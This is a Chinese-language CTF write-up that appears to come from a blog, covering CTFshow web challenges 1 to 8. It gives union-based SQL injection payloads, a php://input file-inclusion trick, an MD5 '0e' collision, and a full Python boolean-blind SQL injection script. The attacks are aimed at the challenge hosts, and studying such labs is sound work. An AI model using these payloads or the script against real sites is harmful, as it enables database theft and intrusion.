CTFshow_web1:

F12查看JS即在代码里

CTFshow_web2:

进入网址后页面如下:

①:尝试使用admin登陆,发现页面无回显

②:尝试单引号闭合,并且添加' or 1=1#,此时在后台查询语句应该为:

SELECT * FROM users where user='admin' or 1=1#&passwd=

条件为真即出现回显,如图:

③:通过查询语句【admin' or 1=1 order by x #】来判断列数,最终得到有3列

④:因为有回显,所以考虑联合查询注入,查询语句为【admin' or 1=1 union select 1,2,3 #】,显示如下,所以2号位有回显

⑤:通过2号位回显去获取数据库更多的信息,具体查询语句如下:

admin' or 1=1 union select 1,database(),3 #

admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

admin' or 1=1 union select 1,group_concat(column_name),3 from

information_schema.tables where table_name='flag' #

admin' or 1=1 union select 1,group_concat(flag),3 from flag #

⑥:依次回显结果如下:

database:web2

tables:flag,user

column:flag

ctf:ctfshow{7b448282-01e0-47d2-8b8a-4fbe3bc76ebb}

CTFshow_web3:

①:打开页面后发现是一个文件包含的题目:

②:尝试访问/etc/passwd,/var/log/nginx/access.log

③:尝试日志包含写入一句话木马,发现被过滤了敏感字符:<>()[]''

③:使用伪协议php://input,写入操作指令,又考虑到是GET请求,所以在burp里抓包修改:

返回结果如下:

ctf_go_go_go index.php

再次使用伪协议查询:

得到旗帜:

ctfshow{bea28caa-2287-4360-b9a9-3a3516f33476}

知识点回顾:

php://input伪协议:php://input 是个可以访问请求的原始数据的只读流。通俗来讲是将文件包含漏洞变成命令执行,一般与POST结合,与GET结合在Burp里使用较方便

CTFshow_web4:

同web3,只不过过滤了php等协议,使用日志注入可以得到,通过蚁剑或者菜刀连接,得到Flag

CTFshow_web5:

打开网页后发现是一条代码审计的题目,关键语句如下:

<?php

        $flag="";

        $v1=$_GET['v1'];

        $v2=$_GET['v2'];

        if(isset($v1) && isset($v2)){

            if(!ctype_alpha($v1)){

                die("v1 error");

            }

            if(!is_numeric($v2)){

                die("v2 error");

            }

            if(md5($v1)==md5($v2)){

                echo $flag;

            }

        }else{

            echo "where is flag?";

        }

    ?>

题目要求位v1,v2 md5编码同,但是v1得是全字符,v2得是全数字

考虑md5碰撞,即v1,v2md5后均以0e开头

则输入

http://fe4405b1-ecd4-4cab-ba59-ec5e20bf9dfc.chall.ctf.show:8080/?v1=QNKCDZO&v2=240610708

获得旗帜

CTFshow_web6:

字符型注入,过滤空格,用/**/替换即可其他步骤同web2

CTFshow_web7:

字符型注入,过滤了空格,双引号

http://3ce03932-8cc0-4775-bd47-8917c5efd019.chall.ctf.show:8080/?id=1'/**/union/**/select/**/1,database(),group_concat(flag)/**/from/**/flag#

CTFshow_web8:

考查的是bool盲注,并且过滤了空格,双引号,构造payload进行自动化脚本注入

注意点:

①:自动化脚本的核心是payload,首先要判断字符型注入和数字型注入,然后根据正确的payload去跑代码

②:当过滤了 (0,1)时,可以使用from 0,for 1,过滤了双引号可以使用16进制进行替换

#!/usr/bin/python

#-*- encoding: utf-8 -*-

import requests

url="http://1c2fdfff-d246-41dd-8e8a-70b65692521d.chall.ctf.show:8080/index.php?id=-1"

dbPayload="/**/or/**/ascii(substr(database()/**/from/**/{0}/**/for/**/1))={1}"

tbPayload="/**/or/**/ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())/**/from/**/{0}/**/for/**/1))={1}"

cuPayload="/**/or/**/ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)/**/from/**/{0}/**/for/**/1))={1}"

alPayload="/**/or/**/ascii(substr((select/**/group_concat(flag)/**/from/**/flag)/**/from/**/{0}/**/for/**/1))={1}"

def Getal(url):

    Gurl=url+alPayload

    print("开始破解所有元素:")

    Allname=""

    for i in range(1,100):

        temp_len=len(Allname)

        for j in range(41,128):

            Durl=Gurl.format(i,j)

            r=requests.get(Durl)

            if 'By Rudyard Kipling' in r.text:

                Allname+=chr(j)

                print("破解中的元素名:",Allname)

                break

        if temp_len==len(Allname):

            print("破解成功,旗帜为:",Allname)

            break

    return Allname

def Dable(url):


    Durl = url + dbPayload

    print("开始破解数据库:")

    Dablename=""

    for i in range(1,50):

        temp_len=len(Dablename)

        for j in range(41,128):

            Turl=Durl.format(i,j)

            r=requests.get(Turl)

            if 'By Rudyard Kipling' in r.text:

                Dablename+=chr(j)

                print("破解中的数据库名:",Dablename)

                break

        if temp_len==len(Dablename):

            print("破解成功,数据库名为:",Dablename)

            break

    return Dablename

def Table(url):

    Aurl=url+tbPayload

    Tablename=""

    print("开始破解数据表:")

    for i in range(1,50):

        temp_len=len(Tablename)

        for j in range(40,128):

            Turl=Aurl.format(i,j)

            r=requests.get(Turl)

            if 'By Rudyard Kipling' in r.text:

                Tablename+=chr(j)

                print("破解中的数据表名",Tablename)

                break

        if temp_len==len(Tablename):

            print("破解成功,数据库表名为:",Tablename)

            break

    return

def Cuable(url):

    Mnurl=url+cuPayload

    Cumname=""

    print("开始破解数据列:")

    for i in range(1,50):

        temp_len=len(Cumname)

        for j in range(40,128):

            Courl=Mnurl.format(i,j)

            r=requests.get(Courl)

            if 'By Rudyard Kipling' in r.text:

                Cumname+=chr(j)

                print("破解中的数据列名",Cumname)

                break

        if temp_len==len(Cumname):

            print("破解成功,数据列名为:",Cumname)

            break

    return Cumname

if __name__ == '__main__':


  Dable(url)

  Table(url)

  Cuable(url)

  Getal(url)

反思:web8如果使用暴力破解花费的时间较大,其实可以使用二分法,大幅度缩短运行时间,并且在判断页面是否正确还可以通过判断返回文章长度,例如:

success_len=len(requests.get(url).text)

....

....

    for i in range(1,50):

        for j in range(40,128):

            Courl=Mnurl.format(i,j)

            r=len(requsets,get(Courl).text)

            if r==success_len:

            ......

此外使用range()函数比使用字典判断更好一方面代码更加美观,另一方面避免字典遗漏部分字符的问题

Ctf_show Web[1-8]的更多相关文章

  1. CTF_show平台 web题解 part3

    web13 题目显示文件上传,各类型上传均提示错误,在使用ctf-scan扫描的时候,发现upload.php.bak. 查看源码: <?php header("content-typ ...

  2. CTF_show平台 web题解 part2

    web10 WITH ROLLUP 绕过 点击取消键弹出源码下载: 源码如下: <?php $flag=""; function replaceSpecialChar($st ...

  3. CTF_show平台 web题解 part1

    web3 题目描述: 方法一:RFI 使用url实现php远程文件包含 在服务器上构造1.txt <?php $a = "<?php eval(\$_POST['123'])?& ...

  4. C# Web应用调试开启外部访问

    在用C#开发Web应用时有个痛点,就是本机用VS开启Web应用调试时外部机器无法访问此Web应用.这里将会介绍如何通过设置允许局域网和外网机器访问本机的Web应用. 目录 1. 设置内网访问 2. 设 ...

  5. 网页提交中文到WEB容器的经历了些什么过程....

    先准备一个网页 <html><meta http-equiv="Content-Type" content="text/html; charset=gb ...

  6. 闲来无聊,研究一下Web服务器 的源程序

    web服务器是如何工作的 1989年的夏天,蒂姆.博纳斯-李开发了世界上第一个web服务器和web客户机.这个浏览器程序是一个简单的电话号码查询软件.最初的web服务器程序就是一个利用浏览器和web服 ...

  7. java: web应用中不经意的内存泄露

    前面有一篇讲解如何在spring mvc web应用中一启动就执行某些逻辑,今天无意发现如果使用不当,很容易引起内存泄露,测试代码如下: 1.定义一个类App package com.cnblogs. ...

  8. 对抗密码破解 —— Web 前端慢 Hash

    (更新:https://www.cnblogs.com/index-html/p/frontend_kdf.html ) 0x00 前言 天下武功,唯快不破.但在密码学中则不同.算法越快,越容易破. ...

  9. 使用 Nodejs 搭建简单的Web服务器

    使用Nodejs搭建Web服务器是学习Node.js比较全面的入门教程,因为要完成一个简单的Web服务器,你需要学习Nodejs中几个比较重要的模块,比如:http协议模块.文件系统.url解析模块. ...

随机推荐

  1. linux(1)Mac上传文件到Linux服务器

    前言 我们使用mac时,想让本地文件上传至服务器,该怎么办呢 windows系统,我们可以使用xftp或者rz命令,那么mac呢? mac系统,我们可以使用sftp.scp或者rz命令,本文介绍sft ...

  2. switch表达式为字符串

    package EXERCISE; import java.util.*; public class HashCode { //switch判断字符串.switch表达式byte,short,int, ...

  3. 2019牛客暑期多校训练营(第二场)E.MAZE(线段树+dp)

    题意:给你一个n*m的矩阵 你只能向左向右相下走 有两种操作 q次询问 一种是把一个单位翻转(即可走变为不可走 不可走变为可走) 另一种是询问从(1,x) 走到 (n,y)有多少种方案 思路:题目n为 ...

  4. linux搭建网站

    CentOS 1.安装 yum -y install nginx *或者安装指定版本,版本网址:http://nginx.org/packages/centos/7/x86_64/RPMS/ rpm ...

  5. PowerShell随笔9--- call

    很多时候我们需要在一个脚本文件执行另外一个脚本文件,比如我们有一个Test.ps1文件 我们有以下2种方法: Invoke-Expression (&) 我们可以看到,Test.ps1中的代码 ...

  6. ThreadLocal使用全解

    一.何为ThreadLocal 1.ThreadLocal的含义 ThreadLocal,即线程变量,是一个以ThreadLocal对象为键,任意对象为值的存储结构.这个结构被附带在线程上,也就是说一 ...

  7. oslab oranges 一个操作系统的实现 实验三 认识保护模式(二):分页

    实验目的: 掌握内存分页机制 对应章节:3.3 实验内容: 1.认真阅读章节资料,掌握什么是分页机制 2. 调试代码,掌握分页机制基本方法与思路 – 代码3.22中,212行---237行,设置断点调 ...

  8. haut-1282 ykc想吃好吃的

    1282: ykc想吃好吃的 时间限制: 1 秒  内存限制: 128 MB提交: 706  解决: 89提交 状态 题目描述 一天,ykc在学校闲的无聊,于是决定上街买点吃的,ykc很懒,本来就不是 ...

  9. liunx命令二

    声明:以下资料全部摘自实验楼 常用快捷键 按键 作用 Table 补全命令 Ctrl+c 强制结束 Ctrl+d 键盘输入结束或退出终端 Ctrl+s 暂停当前程序,暂停后按下任意键恢复运行 Ctrl ...

  10. 事件循环 EventLoop(Promise,setTimeOut,async/await执行顺序)

    什么是事件循环?想要了解什么是事件循环就要从js的工作原理开始说起: JS主要的特点就是单线程,所谓单线程就是进程中只有一个线程在运行. 为什么JS是单线程的而不是多线程的呢? JS的主要用途就是与用 ...